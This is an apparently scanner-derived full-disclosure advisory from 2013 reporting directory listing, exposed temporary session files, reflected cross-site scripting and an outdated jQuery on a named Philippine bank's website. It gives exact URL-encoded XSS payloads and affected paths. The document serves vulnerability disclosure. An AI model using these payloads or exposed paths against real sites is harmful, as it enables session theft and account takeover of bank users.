FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable Report-Timeline: ================ 23-08-2013 Advisory Response:"Our country does not have the same laws as their own and we do not consider to be security flaws the data you send us. Thank you very much" ( /ME I dont understand this response.. Is it a joke? ) 20-08-2013 Full Disclosure I-VULNERABILITY ------------------------- #Title: FICOBank Directory Listing Information Disclosure / Cross Site Scripting / Jquery Old Version Vulnerable #Vendor:http://www.ficobank.com / http://ficobank.com #Author:Juan Carlos Garca (@secnight) #Follow me http://www.highsec.es Twitter:@secnight II-Introduction: ============= The First Isabela Cooperative Bank (FICOBank) is one of the pioneer and prominent cooperative banks in the Philippines. Its origin is deeply rooted in the community, as it was organized 36 years ago by two cooperatives and 47 samahang nayons, which represented the farmers who have limited resources and access to banking services. From a molehill-size cooperative rural bank that it opted to be, it elevated to a mountain-high cooperative bank, as it can now lay claim to a resource base of over Php 2.37 billion (as of December 31, 2012). ------------------------- III-PROOF OF CONCEPT ==================== Attack details -------------- Directory Listing ***************** The web server is configured to display the list of files contained in this directory. This is not recommended because the directory may contain files that are not normally exposed through links on the web site.A user can view a list of all files from this directory possibly exposing sensitive information. Affected items http://ficobank.com/annualreport/ /annualreport /annualreport/_notes /annualreport/annualreport /Assets4Sale /Assets4Sale/a4sale /Assets4Sale/a4sale/_notes /contact /contact/_notes /contact/html-contact-form-captcha /contact/html-contact-form-captcha/_notes /contact/html-contact-form-captcha/scripts /contact/html-contact-form-captcha/scripts/_notes /contact/scripts /contact/scripts/_notes /contact/scripts-old /contact/scripts-old/_notes /DepositProducts /DepositProducts/_notes /Ficonnect /flash /flash/_notes /images /images/awards /images/images /images/jobopening /images/jobopening/_notes /images/officer /images/signature /images/signature/_notes /images/slides /Leadership /LoanProducts /news /news/_notes /OtherServices /OtherServices/_notes /scripts /scripts/_notes /Stylesheet /Stylesheet/_notes Temporary file/directory Affected items http://www.ficobank.com/tmp/ /tmp /tmp/mailError.log /tmp/sess_secnightsessionfixation /tmp/sess_b35e89c88df72a4c589a5a8e1a495594 /tmp/sess_f277f2a2689ac1ee7b04b527b80b9b7c /tmp/untitled File Lock These lock files often contain usernames of the user that has locked the file. Username harvesting can be done using this technique... http://www.ficobank.com/DepositProducts/ Cross Site Scripting **************** Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it will execute the script in the user context allowing the attacker to access any cookies or session tokens retained by the browser. Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.An attacker can steal the session cookie and take over the account,impersonating the user.It is also possible to modify the content of the page presented to the user. Affected items /contact/contactus.php URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(947854) bad=' The input is reflected inside a tag parameter between single quotes. Variant email(2) 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28947854%29%20bad%3d%27&message=20&name=secnight&submit=Submit 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28924627%29%20bad%3d%27&message=20&name=jjxlxmqv&submit=Submit Variant Name URL encoded POST input name was set to secnight'and jjxlxmqv' onmouseover=prompt(991722) bad=' The input is reflected inside a tag parameter between single quotes. POST /contact/contactus.php 6_letters_code=94102&email=sample%40email.tst&message=20&name=secnight%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit 6_letters_code=94102&email=sample%40email.tst&message=20&name=jjxlxmqv%27%20onmouseover%3dprompt%28991722%29%20bad%3d%27&submit=Submit /contact/email.php URI was set to #" onmouseover=prompt(919235) // The input is reflected inside a tag parameter between double quotes. GET /contact/email.php/%F6%22%20onmouseover=prompt(919235)%20// /contact/email.php.bak URI was set to #" onmouseover=prompt(994575) // GET /contact/email.php.bak/%F6%22%20onmouseover=prompt(994575)%20// /contact/email.php.BAK URI was set to #" onmouseover=prompt(924567) // The input is reflected inside a tag parameter between double quotes. GET /contact/email.php.BAK/%F6%22%20onmouseover=prompt(924567)%20// /contact/html-contact-form-captcha/html-contact-form.php (4) URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(913822) bad=' POST /contact/html-contact-form-captcha/html-contact-form.php 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28913822%29%20bad%3d%27&message=20&name=fpfvlamn&submit=Submit /contact/samplexyz.php (7) URL encoded POST input contactname was set to pdnfeddf" onmouseover=prompt(969944) bad=" POST /contact/samplexyz.php contactname=pdnfeddf%22%20onmouseover%3dprompt%28969944%29%20bad%3d%22&email=sample%40email.tst&subject=1 Variants contactname,email,subject /contact/samplexyz.php.bak URI was set to #" onmouseover=prompt(959358) // The input is reflected inside a tag parameter between double quotes. GET /contact/samplexyz.php.bak/%F6%22%20onmouseover=prompt(959358)%20// /contact/samplexyz.php.BAK URI was set to #" onmouseover=prompt(966989) // GET /contact/samplexyz.php.BAK/%F6%22%20onmouseover=prompt(966989)%20// /contactus.php(4) Variant email, name email(3) URL encoded POST input email was set to sample%40email.tst' onmouseover=prompt(971885) bad=' 6_letters_code=94102&email=sample%2540email.tst%27%20onmouseover%3dprompt%28971885%29%20bad%3d%27&message=20&name=bxaskxpx&submit=Submit name(1) URL encoded POST input name was set to iwelgyng' onmouseover=prompt(991324) bad=' 6_letters_code=94102&email=sample%40email.tst&message=20&name=iwelgyng%27%20onmouseover%3dprompt%28991324%29%20bad%3d%27&submit=Submit Jquery Old Version Vulnerable *************************** jQuery JavaScript Library v1.4.2 This problem was fixed in jQuery 1.6.3. This page is using an older version of jQuery that is vulnerable to a Cross Site Scripting vulnerability. Many sites are using to select elements using location.hash that allows someone to inject script into the page. $("#id") is css selector, $("<img>") is createElement, and $("#<img>") is createElement too. Affected items /OtherServices/fade.min.js GET /OtherServices/fade.min.js Response: HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:45 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Tue, 13 Dec 2011 07:09:36 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 /OtherServices/jquery.fade.js GET /OtherServices/jquery.fade.js jquery_xss/#<img src=/ onerror=alert(1)> Response HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:46 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Tue, 13 Dec 2011 07:09:52 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 Content-Length: 72174 /scripts/fade.min.js GET /scripts/fade.min.js Response HTTP/1.1 200 OK Date: Fri, 23 Aug 2013 15:48:46 GMT P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Last-Modified: Thu, 11 Jul 2013 03:44:10 GMT Accept-Ranges: bytes Content-Type: application/x-javascript Age: 0 Connection: keep-alive Server: YTS/1.20.28 Content-Length: 72174 /scripts/jquery.fade.js GET scripts/jquery.fade.js Response The same.. IV. CREDITS ------------------------- This vulnerability has been discovered by Juan Carlos Garca(@secnight) Special Thanks: Perseo V. LEGAL NOTICES ------------------------- The Author accepts no responsibility for any damage caused by the use or misuse of this information.